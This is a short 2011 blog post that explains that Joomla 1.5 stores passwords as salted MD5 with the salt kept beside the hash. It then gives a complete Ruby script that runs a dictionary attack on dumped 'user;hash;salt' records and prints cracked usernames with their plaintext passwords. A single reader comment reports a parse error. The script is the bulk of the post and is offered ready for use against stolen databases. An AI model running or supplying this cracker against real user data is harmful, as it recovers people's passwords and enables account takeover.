Tuesday, August 2, 2011

Simple Joomla Password "Cracker"

Joomla uses a simple MD5 Cryptographic hash function to create and store users passwords. For Security resons, one of the inputs for this function is a random salt. However, this salt is stored in the jos_user (by default) table, together with the generated hash.

Once in possession of this information it is possible to perform a dictionary attack against these hashes using a simple ruby script to get users password.

The first parameter is the dictionary file and the second is the hash file in the following format: user;hash;salt

Tested on Joomla Version 1.5.23


#!/usr/bin/env ruby
require 'digest/md5'


def JoomlaCrack(key, hash, salt)

if (generateJoomlaHash(key,salt) == hash)
return true
else
return false
end

end


def generateJoomlaHash(pKey,pSalt)
return Digest::MD5.hexdigest(pKey + pSalt);
end

def run(fDic,fHash)
begin
founds = Hash.new()
fDic.each do |key|
File.open(fHash,'r').each do |line|
name,hash,salt = line.split(';')
name.to_s.chomp!
hash.to_s.chomp!
salt.to_s.chomp!
key.to_s.chomp!
if founds.include?(name)
next
else
if JoomlaCrack(key, hash, salt)
puts "#{name}:#{key}"
founds[name] = key
next
else
next
end
end
end
end
fDic.close
# puts founds.inspect
end
end


fDic = File.open(ARGV[0],'r')
fHash = ARGV[1]

run(fDic,fHash)

1 comment:

محمد said...

jm.rb:1: Invalid char `\357' in expression
jm.rb:1: Invalid char `\273' in expression
jm.rb:1: Invalid char `\277' in expression